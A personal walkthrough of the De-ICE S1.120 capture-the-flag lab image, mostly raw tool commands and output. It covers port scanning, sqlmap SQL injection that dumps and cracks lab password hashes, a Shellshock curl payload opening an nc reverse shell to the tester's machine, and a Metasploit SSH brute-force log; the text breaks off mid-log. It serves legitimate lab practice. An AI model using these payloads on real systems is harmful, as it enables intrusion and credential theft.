While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
SE-ICE S1.120
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
Default IP 192.168.1.120
Flags:
1. Create list of open ports
2. This is primarily a web penetration test act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system
Spoilers and Walkthrough
Port scan the image to get started.
root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120 Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST Nmap scan report for 192.168.1.120 Host is up (0.00047s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.2 22/tcp open ssh OpenSSH 5.1 (protocol 2.0) 80/tcp open http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0) 443/tcp open ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0) 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:A4:37:1E (VMware) Service Info: OS: Unix Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds
This is primarily a vulnerable web app so I started working with html injection on the http://192.168.1.120/add_product.php page
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally if you can get html injection it is possible to get XSS if you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used burp to capture the request. Then saved it and loaded it into SQL map. the -r is what I named the file and -p is the name of the parameter to attack.
sqlmap -r /root/Desktop/deice/120webrequest -p priceNo joy so lets hit it a little harder
sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3
Nope lets try the other parameters
sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3 sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3
I might have busted it but there is another parameter here you can test. Feed the id parameter to sqlmap using the –wizard option http://192.168.1.120/products.php?id=1
sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3 root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 14:43:07 [14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2' [14:43:07] [INFO] testing connection to the target URL [14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds [14:43:08] [INFO] target URL is stable [14:43:08] [INFO] testing if GET parameter 'id' is dynamic [14:43:08] [INFO] confirming that GET parameter 'id' is dynamic [14:43:08] [INFO] GET parameter 'id' is dynamic [14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable [14:43:09] [INFO] testing for SQL injection on GET parameter 'id' [14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
BOOM goes the dynamite! and now we wait while sqlmap handles its business. If you don’t want to mess with Burp the same command is:
sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:05:47 [09:05:47] [INFO] testing connection to the target URL [09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds [09:05:48] [INFO] target URL is stable [09:05:48] [INFO] testing if GET parameter 'id' is dynamic [09:05:49] [INFO] confirming that GET parameter 'id' is dynamic [09:05:49] [INFO] GET parameter 'id' is dynamic [09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable [09:05:49] [INFO] testing for SQL injection on GET parameter 'id' [09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [09:05:49] [INFO] testing 'MySQL inline queries' [09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries' [09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait.................. [09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable [09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:06:00] [WARNING] reflective value(s) found and filtering out [09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 71 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 1082=1082 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [09:06:14] [INFO] the back-end DBMS is MySQL [09:06:14] [INFO] fetching banner [09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [09:06:14] [INFO] retrieved: 5.1.33 web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0.11 banner: '5.1.33' [09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120' [*] shutting down at 09:06:16
It is time to get down on the database.
sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1 ****Partial output This takes awhile**** database management system users [50]: [*] 'aadams'@'localhost' [*] 'aallen'@'localhost' [*] 'aard'@'localhost' [*] 'aharp'@'localhost' [*] 'aheflin'@'localhost' [*] 'amaynard'@'localhost' [*] 'aspears'@'localhost' [*] 'aweiland'@'localhost' [*] 'bbanter'@'localhost' [*] 'bphillips'@'localhost' [*] 'bwatkins'@'localhost' [*] 'cchisholm'@'localhost' [*] 'ccoffee'@'localhost' [*] 'dcooper'@'localhost' [*] 'dgilfillan'@'localhost' [*] 'dgrant'@'localhost' [*] 'djohnson'@'localhost' [*] 'dstevens'@'localhost' [*] 'dtraylor'@'localhost' [*] 'dwestling'@'localhost' [*] 'hlovell'@'localhost' [*] 'jalcantar'@'localhost' [*] 'jalvarez'@'localhost' [*] 'jayala'@'localhost' [*] 'jbresnahan'@'localhost' [*] 'jdavenport'@'localhost' [*] 'jduff'@'localhost' [*] 'jfranklin'@'localhost' [*] 'kclemons'@'localhost' [*] 'krenfro'@'localhost' [*] 'ktso'@'localhost' [*] 'kwebber'@'localhost' [*] 'lmartinez'@'localhost' [*] 'lmorales'@'localhost' [*] 'mbryan'@'localhost' [*] 'mholland'@'localhost' [*] 'mnader'@'localhost' [*] 'mrodriguez'@'localhost' [*] 'myajima'@'localhost' [*] 'qpowers'@'localhost' [*] 'rdominguez'@'localhost' [*] 'rjacobson'@'localhost' [*] 'rpatel'@'localhost' [*] 'sgains'@'localhost' [*] 'sjohnson'@'localhost' [*] 'strammel'@'localhost' [*] 'swarren'@'localhost' [*] 'tdeleon'@'localhost' [*] 'tgoodchap'@'localhost' [*] 'webapp'@'localhost'
When it retrieves the password hashes. You will get prompted to let sqlmap crack them automatically.
Just note that there are so many user names and passwords that the next couple pages are a mass spoiler.
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt' do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y [09:47:39] [INFO] using hash method 'mysql_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 2 what's the custom dictionary's location? > /usr/share/wordlists/rockyou.txt [09:48:22] [INFO] using custom dictionary do you want to use common password suffixes? (slow!) [y/N] N [*] aadams [1]: password hash: *F491287896471CB21030790BF46865C4A39DE651 clear-text password: batman [*] aallen [1]: password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E clear-text password: superman [*] aard [1]: password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 clear-text password: cheese [*] aharp [1]: password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC clear-text password: pokemon [*] aheflin [1]: password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5 clear-text password: whatever [*] amaynard [1]: password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 clear-text password: kotaku [*] aspears [1]: password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597 clear-text password: iloveyou [*] aweiland [1]: password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC clear-text password: 666666 [*] bbanter [1]: password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 clear-text password: michelle [*] bphillips [1]: password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 clear-text password: 123123 [*] bwatkins [1]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 clear-text password: 123456 [*] cchisholm [1]: password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947 clear-text password: baseball [*] ccoffee [1]: password hash: *B12289EEF8752AD620294A64A37CD586223AB454 clear-text password: 0 [*] dcooper [1]: password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001 clear-text password: sunshine [*] dgilfillan [1]: password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622 clear-text password: starwars [*] dgrant [1]: password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 clear-text password: letmein [*] djohnson [1]: password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 clear-text password: killer [*] dstevens [1]: password hash: *797420C584EBF42750EB523104268BA0FD87FBC8 clear-text password: internet [*] dtraylor [1]: password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA [*] dwestling [1]: password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530 clear-text password: shadow [*] hlovell [1]: password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 clear-text password: consumer [*] jalcantar [1]: password hash: *46CFC7938B60837F46B610A2D10C248874555C14 clear-text password: trustno1 [*] jalvarez [1]: password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 clear-text password: password [*] jayala [1]: password hash: *6691484EA6B50DDDE1926A220DA01FA9E575C18A clear-text password: abc123 [*] jbresnahan [1]: password hash: *446525BB82B5E22BD9E525261D37C494F623C52B clear-text password: blahblah [*] jdavenport [1]: password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D [*] jduff [1]: password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A clear-text password: princess [*] jfranklin [1]: password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 clear-text password: 654321 [*] kclemons [1]: password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 clear-text password: passw0rd [*] krenfro [1]: password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 clear-text password: master [*] ktso [1]: password hash: *A4B6157319038724E3560894F7F932C8886EBFCF clear-text password: 1234 [*] kwebber [1]: password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30 clear-text password: dragon [*] lmartinez [1]: password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286 clear-text password: pepper [*] lmorales [1]: password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660 clear-text password: football [*] mbryan [1]: password hash: *B021918A5DCA54916CF724573179571DFC37AC88 clear-text password: jennifer [*] mholland [1]: password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC clear-text password: jordan [*] mnader [1]: password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 clear-text password: welcome [*] mrodriguez [1]: password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601 clear-text password: qwerty [*] myajima [1]: password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186 [*] qpowers [1]: password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 clear-text password: michael [*] rdominguez [1]: password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9 clear-text password: 12345 [*] rjacobson [1]: password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA clear-text password: 111111 [*] rpatel [1]: password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 clear-text password: 1234567 [*] sgains [1]: password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F clear-text password: computer [*] sjohnson [1]: password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 clear-text password: 12345678 [*] strammel [1]: password hash: *A5892368AE83685440A1E27D012306B073BDF5B7 clear-text password: monkey [*] swarren [1]: password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 clear-text password: Password [*] tdeleon [1]: password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A clear-text password: soccer [*] tgoodchap [1]: password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 clear-text password: nintendo [*] webapp [1]: password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F
We know that we have SQL injection but lets hit it with nikto also. This thing is a wreck.
root@SNM-KScan-2:~# nikto -h 192.168.1.120 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.120 + Target Hostname: 192.168.1.120 + Target Port: 80 + Start Time: 2015-01-08 09:21:21 (GMT-7) --------------------------------------------------------------------------- + Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 + Retrieved x-powered-by header: PHP/5.2.9 + The anti-clickjacking X-Frame-Options header is not present. + mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1) + mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7) + Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current. + mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version) + PHP/5.2.9 appears to be outdated (current is at least 5.4.26) + Perl/v5.10.0 appears to be outdated (current is at least v5.14.2) + OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current. + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007 + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756. + OSVDB-3268: /webalizer/: Directory indexing found. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431. + OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + 7354 requests: 0 error(s) and 25 item(s) reported on remote host + End Time: 2015-01-08 09:22:12 (GMT-7) (51 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
So I’m not giving up on Shellshock.
curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"' http://192.168.1.120/cgi-bin/printenv.cgi
Nope no joy. Lets try some metasploit attacks. Port 631 was listening and we have usernames and password.
use exploit/multi/http/cups_bash_env_exec
Even less joy. Sigh…lets just try the reversed passwords for the accounts. Our old friends ccoffee, bbanter and aadams are all there.
Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 3 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.1.120 yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /root/Desktop/deice/users.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(ssh_login) > run [*] 192.168.1.120:22 SSH - Starting bruteforce [+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700 [+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700 [+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700 [+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700 [+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700 [+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700 [+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700 [+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700 [+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700 [+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700 [+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700 [+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700 [+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700 [+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700 [+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700 [+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700 [+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700 [+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700 [+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700 [+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700 [+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700 [+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700 [+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700 [+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700 [+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700 [+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] 